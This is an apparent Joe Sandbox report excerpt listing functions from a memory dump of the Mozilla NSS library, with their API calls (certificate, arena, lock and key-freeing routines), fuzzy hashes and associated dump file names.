Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Util$Alloc_ArenaArena_CurrentDecoderThread$ContentDestroyFinishGrow_InfoStart
String ID:
API String ID: 1507683295-0
Opcode ID: bc4ce606f5cc9647b1fc8335c382db5cded19a5fed62089ebcb8a3dbaeea27c0
Instruction ID: 7c92b0024eef26623bd7b8d578c0f82ce6769f73860d626fc7f68c588964714c
Opcode Fuzzy Hash: bc4ce606f5cc9647b1fc8335c382db5cded19a5fed62089ebcb8a3dbaeea27c0
Instruction Fuzzy Hash: C12148B1501608AFE7209F29CA90B92BBE4BB09358F10CD2ED46DC7A51D731F855CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6C80ACB0 Relevance: 6.1, APIs: 4, Instructions: 66COMMON

Download Yara Rule

APIs

CERT_NewCertList.NSS3 ref: 6C80ACC2

Part of subcall function 6C7E2F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C7E2F0A
Part of subcall function 6C7E2F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C7E2F1D

Part of subcall function 6C7E2AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6C7E0A1B,00000000), ref: 6C7E2AF0
Part of subcall function 6C7E2AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7E2B11

CERT_DestroyCertList.NSS3(00000000), ref: 6C80AD5E

Part of subcall function 6C8257D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C7EB41E,00000000,00000000,?,00000000,?,6C7EB41E,00000000,00000000,00000001,?), ref: 6C8257E0
Part of subcall function 6C8257D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C825843

CERT_DestroyCertList.NSS3(?), ref: 6C80AD36

Part of subcall function 6C7E2F50: CERT_DestroyCertificate.NSS3(?), ref: 6C7E2F65
Part of subcall function 6C7E2F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C7E2F83

free.MOZGLUE(?), ref: 6C80AD4F

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
String ID:
API String ID: 132756963-0
Opcode ID: b3184e8bf3dd21015553b9cd3e62bbf41baa0e0e1de844370a1678f88b66b95d
Instruction ID: 5f088f13e942fff190154515af76553d4a77f3e922db891b6373c261b51de62c
Opcode Fuzzy Hash: b3184e8bf3dd21015553b9cd3e62bbf41baa0e0e1de844370a1678f88b66b95d
Instruction Fuzzy Hash: 5E21C6B2E002189BEB20DF64DE095EE77B4AF09209F554468DC04B7710FB31AA49CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6C8224E0 Relevance: 6.1, APIs: 4, Instructions: 65COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C8224FF
EnterCriticalSection.KERNEL32(?), ref: 6C82250F
PR_Unlock.NSS3(?), ref: 6C82253C
PR_SetError.NSS3(00000000,00000000), ref: 6C822554

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: efbeb91fada5e96250404bf95948f533fb2618e9e629fe514a656da78f7d6a67
Instruction ID: b2a60814441152d8de1b56a29f53f8e20f161f80189dcf5205c575af27c5ef84
Opcode Fuzzy Hash: efbeb91fada5e96250404bf95948f533fb2618e9e629fe514a656da78f7d6a67
Instruction Fuzzy Hash: 28112971E00118ABDB20AF68DE489BB7B78EF06228F514534EC0897301E735E954C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 6C83ECB0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6C83F0AD,6C83F150,?,6C83F150,?,?,?), ref: 6C83ECBA

Part of subcall function 6C840FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7E87ED,00000800,6C7DEF74,00000000), ref: 6C841000
Part of subcall function 6C840FF0: PR_NewLock.NSS3(?,00000800,6C7DEF74,00000000), ref: 6C841016
Part of subcall function 6C840FF0: PL_InitArenaPool.NSS3(00000000,security,6C7E87ED,00000008,?,00000800,6C7DEF74,00000000), ref: 6C84102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6C83ECD1

Part of subcall function 6C8410C0: TlsGetValue.KERNEL32(?,6C7E8802,00000000,00000008,?,6C7DEF74,00000000), ref: 6C8410F3
Part of subcall function 6C8410C0: EnterCriticalSection.KERNEL32(?,?,6C7E8802,00000000,00000008,?,6C7DEF74,00000000), ref: 6C84110C
Part of subcall function 6C8410C0: PL_ArenaAllocate.NSS3(?,?,?,6C7E8802,00000000,00000008,?,6C7DEF74,00000000), ref: 6C841141
Part of subcall function 6C8410C0: PR_Unlock.NSS3(?,?,?,6C7E8802,00000000,00000008,?,6C7DEF74,00000000), ref: 6C841182
Part of subcall function 6C8410C0: TlsGetValue.KERNEL32(?,6C7E8802,00000000,00000008,?,6C7DEF74,00000000), ref: 6C84119C

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6C83ED02

Part of subcall function 6C8410C0: PL_ArenaAllocate.NSS3(?,6C7E8802,00000000,00000008,?,6C7DEF74,00000000), ref: 6C84116E

PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6C83ED5A

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
String ID:
API String ID: 2957673229-0
Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction ID: 0ab04be80596f74674bf98ab0e8f6c2e510480b9bef52ff82d2192078f2abf27
Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction Fuzzy Hash: 8D2104B19007525BE310CF29DA44B52B7E4BFA4309F15E629E80C87B61FB70E990C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 6C86EDB0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6C857FFA,?,6C859767,?,8B7874C0,0000A48E), ref: 6C86EDD4
realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6C857FFA,?,6C859767,?,8B7874C0,0000A48E), ref: 6C86EDFD
PORT_Alloc_Util.NSS3(?,00000000,00000000,6C857FFA,?,6C859767,?,8B7874C0,0000A48E), ref: 6C86EE14

Part of subcall function 6C840BE0: malloc.MOZGLUE(6C838D2D,?,00000000,?), ref: 6C840BF8
Part of subcall function 6C840BE0: TlsGetValue.KERNEL32(6C838D2D,?,00000000,?), ref: 6C840C15

memcpy.VCRUNTIME140(?,?,6C859767,00000000,00000000,6C857FFA,?,6C859767,?,8B7874C0,0000A48E), ref: 6C86EE33

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID:
API String ID: 3903481028-0
Opcode ID: 6d7718ced453571895cec683cc578cb8c65bd0b2e608169fa125a5d66fbff81a
Instruction ID: 0b81c18dffe100a926b3d66c2c0e1fb242266bae55c6ff3102bce21fc2ddee77
Opcode Fuzzy Hash: 6d7718ced453571895cec683cc578cb8c65bd0b2e608169fa125a5d66fbff81a
Instruction Fuzzy Hash: DD11CA71900706AFD7309E6ADE84B467368EF0035DF204935E919C6E40E730F464C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 6C808DD0 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C808DE7
EnterCriticalSection.KERNEL32 ref: 6C808DFC
PR_Unlock.NSS3 ref: 6C808E2D
PR_SetError.NSS3 ref: 6C808E49

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: a653abc33e5dda07d5b622cd814f8ea55cedfd0bc74d007bcdc14dd953dba1e5
Instruction ID: 1a6f3348743d66e814b6a519cc1a00933435aade3fa4102bd9d83388236d25c2
Opcode Fuzzy Hash: a653abc33e5dda07d5b622cd814f8ea55cedfd0bc74d007bcdc14dd953dba1e5
Instruction Fuzzy Hash: 42114FB1609A159BD710BF78D648569BBF4FF05359F014D6ADC889BB00E730E8A4CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6C88AC70 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6C875F17,?,?,?,?,?,?,?,?,6C87AAD4), ref: 6C88AC94
PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6C875F17,?,?,?,?,?,?,?,?,6C87AAD4), ref: 6C88ACA6
free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6C87AAD4), ref: 6C88ACC0
free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6C87AAD4), ref: 6C88ACDB

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: free$DestroyFreeK11_Monitor
String ID:
API String ID: 3989322779-0
Opcode ID: 6f9f3521039a6fee31a211b68dc716c37be8e4457cbebab79f23d09ac09588c1
Instruction ID: 72b16901ec309b68e167f7baece2c2051e97b1f50b9b0bbdd09b1d67359b4727
Opcode Fuzzy Hash: 6f9f3521039a6fee31a211b68dc716c37be8e4457cbebab79f23d09ac09588c1
Instruction Fuzzy Hash: 1C015EB1602B159BEB70DF2ADA08793B7E9BF00699B114839D85EC3E80E735F054CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6C84C590 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C84C5AD

Part of subcall function 6C840FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7E87ED,00000800,6C7DEF74,00000000), ref: 6C841000
Part of subcall function 6C840FF0: PR_NewLock.NSS3(?,00000800,6C7DEF74,00000000), ref: 6C841016
Part of subcall function 6C840FF0: PL_InitArenaPool.NSS3(00000000,security,6C7E87ED,00000008,?,00000800,6C7DEF74,00000000), ref: 6C84102B

CERT_DecodeCertPackage.NSS3(?,?,6C84C610,?), ref: 6C84C5C2

Part of subcall function 6C84C0B0: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C84C0E6

CERT_NewTempCertificate.NSS3(?,00000000,00000000,00000001), ref: 6C84C5E0
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C84C5EF

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Arena_Util$ArenaCertCertificateDecodeErrorFreeInitLockPackagePoolTempcalloc
String ID:
API String ID: 1454898856-0
Opcode ID: fb0de408eb16f056bc48862ad7400d1196ea123daf9386190db8a9f8b78de7df
Instruction ID: f92e58c4fc1bc99e3a66aaf823801320200cefd6866ec5dc59fe9b9ee9aefbe3
Opcode Fuzzy Hash: fb0de408eb16f056bc48862ad7400d1196ea123daf9386190db8a9f8b78de7df
Instruction Fuzzy Hash: 5A01F2B1E001086BEB10AB68DD06EBF7B78DF00608F458039ED059B341F731AD18C6E1

Uniqueness

Uniqueness Score: -1.00%

Function 6C8424E0 Relevance: 6.0, APIs: 4, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,6C81C154,000000FF,00000000,00000000,00000000,00000000,?,?,6C81C154,?), ref: 6C8424FA
PORT_Alloc_Util.NSS3(00000000,?,6C81C154,?), ref: 6C842509

Part of subcall function 6C840BE0: malloc.MOZGLUE(6C838D2D,?,00000000,?), ref: 6C840BF8
Part of subcall function 6C840BE0: TlsGetValue.KERNEL32(6C838D2D,?,00000000,?), ref: 6C840C15

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,?), ref: 6C842525
free.MOZGLUE(00000000), ref: 6C842532

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: ByteCharMultiWide$Alloc_UtilValuefreemalloc
String ID:
API String ID: 929835568-0
Opcode ID: 158dfce241dc5714bcff1c25a01b83a26bc409a5c7250a4dda55cb6572c969dd
Instruction ID: f7fa9cdb585bf3a5e28136bc96eb8aac6160db17ac517173222cce79b6743270
Opcode Fuzzy Hash: 158dfce241dc5714bcff1c25a01b83a26bc409a5c7250a4dda55cb6572c969dd
Instruction Fuzzy Hash: D9F062B230A12936FB30256A5D09EB739ACDB426F8B250731F92CC66C0DA54C811C1F1

Uniqueness

Uniqueness Score: -1.00%

Function 6C88AC00 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

PK11_FreeSymKey.NSS3(?,6C875D40,00000000,?,?,6C866AC6,6C87639C), ref: 6C88AC2D

Part of subcall function 6C82ADC0: TlsGetValue.KERNEL32(?,6C80CDBB,?,6C80D079,00000000,00000001), ref: 6C82AE10
Part of subcall function 6C82ADC0: EnterCriticalSection.KERNEL32(?,?,6C80CDBB,?,6C80D079,00000000,00000001), ref: 6C82AE24
Part of subcall function 6C82ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C80D079,00000000,00000001), ref: 6C82AE5A
Part of subcall function 6C82ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C80CDBB,?,6C80D079,00000000,00000001), ref: 6C82AE6F
Part of subcall function 6C82ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C80CDBB,?,6C80D079,00000000,00000001), ref: 6C82AE7F
Part of subcall function 6C82ADC0: TlsGetValue.KERNEL32(?,6C80CDBB,?,6C80D079,00000000,00000001), ref: 6C82AEB1
Part of subcall function 6C82ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C80CDBB,?,6C80D079,00000000,00000001), ref: 6C82AEC9

PK11_FreeSymKey.NSS3(?,6C875D40,00000000,?,?,6C866AC6,6C87639C), ref: 6C88AC44
SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,6C875D40,00000000,?,?,6C866AC6,6C87639C), ref: 6C88AC59
free.MOZGLUE(8CB6FF01,6C866AC6,6C87639C,?,?,?,?,?,?,?,?,?,6C875D40,00000000,?,6C87AAD4), ref: 6C88AC62

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
String ID:
API String ID: 1595327144-0
Opcode ID: dbe6ae386a234afffe6ce99493464eafb3b5c636e7828abd6a6849edfc283132
Instruction ID: 9bd5f259d51e2e22fd79024a2fd2057dab191b4469ee0f83d9f94f58892f878c
Opcode Fuzzy Hash: dbe6ae386a234afffe6ce99493464eafb3b5c636e7828abd6a6849edfc283132
Instruction Fuzzy Hash: A9018FB56012009FDB20CF18EAC0B8677A9AF0475DF188468ED098FB86D735E844CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6C870450 Relevance: 6.0, APIs: 4, Instructions: 38synchronizationCOMMON

Download Yara Rule

APIs

ReleaseMutex.KERNEL32(40C70845,?,6C874710,?,000F4240,00000000), ref: 6C87046B
GetLastError.KERNEL32(?,6C874710,?,000F4240,00000000), ref: 6C870479

Part of subcall function 6C88BF80: TlsGetValue.KERNEL32(00000000,?,6C87461B,-00000004), ref: 6C88C244

PR_Unlock.NSS3(40C70845,?,6C874710,?,000F4240,00000000), ref: 6C870492
PR_SetError.NSS3(FFFFE89D,00000000,?,6C874710,?,000F4240,00000000), ref: 6C8704A5

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Error$LastMutexReleaseUnlockValue
String ID:
API String ID: 4014558462-0
Opcode ID: 6376dc356398bedbe8ca4c77e668e50712ef8e19896c8abf4465cb48539373b3
Instruction ID: d3e6d87e26477c3bd396f76dc1dd1f9124aea2597e320685680bec400afd4420
Opcode Fuzzy Hash: 6376dc356398bedbe8ca4c77e668e50712ef8e19896c8abf4465cb48539373b3
Instruction Fuzzy Hash: F9F0B470B182455BEB30AAB99F1CF5F33A99B1120DF148C35E80AC7E91FB22E4648535

Uniqueness

Uniqueness Score: -1.00%

Function 6C8FCC50 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(?), ref: 6C8FCC61
free.MOZGLUE ref: 6C8FCC6E
DeleteCriticalSection.KERNEL32(?), ref: 6C8FCC80
free.MOZGLUE(?), ref: 6C8FCC87

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: CriticalDeleteSectionfree
String ID:
API String ID: 2988086103-0
Opcode ID: 64f1435205009f3a9a758ad5580ba1ea5af4ff84c28200a53e070ca9be631e12
Instruction ID: 44a6578317132e456b363ad1315605ed9dec4a55a5d2c918ba571a05857da961
Opcode Fuzzy Hash: 64f1435205009f3a9a758ad5580ba1ea5af4ff84c28200a53e070ca9be631e12
Instruction Fuzzy Hash: 23E03076704A189BCB10EFA8DC4488677BCEF492703150625E695D3700D331F905CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6C834D10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6C834D57
PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6C834DE6

Strings

%d.%d, xrefs: 6C834DDE

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: ErrorR_snprintf
String ID: %d.%d
API String ID: 2298970422-3954714993
Opcode ID: a0baaab16c71174db9a630f03c41a56333427562979f07d838d63f7aae1b6819
Instruction ID: 1c2d2bfc175739ec1447cf452a271ae629c15dacfe0015e4b1817c97695fb01d
Opcode Fuzzy Hash: a0baaab16c71174db9a630f03c41a56333427562979f07d838d63f7aae1b6819
Instruction Fuzzy Hash: 1631FDB2D042286BEB205BE59D05BFF7B68DFC0308F011829ED0997781EB319905CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6C840DB0 Relevance: 5.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

APIs

calloc.MOZGLUE ref: 6C840DF5
TlsGetValue.KERNEL32 ref: 6C840E2D
TlsGetValue.KERNEL32 ref: 6C840E58
TlsGetValue.KERNEL32 ref: 6C840E84

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Value$calloc
String ID:
API String ID: 3339632435-0
Opcode ID: b37111d5f8eeb823df777cbcd040518c741bde7b5a50465ec83e0af65f747a1f
Instruction ID: a924e98c262ec472093793b2d965a0b7359e6e45be55b825a94ceed85a20281e
Opcode Fuzzy Hash: b37111d5f8eeb823df777cbcd040518c741bde7b5a50465ec83e0af65f747a1f
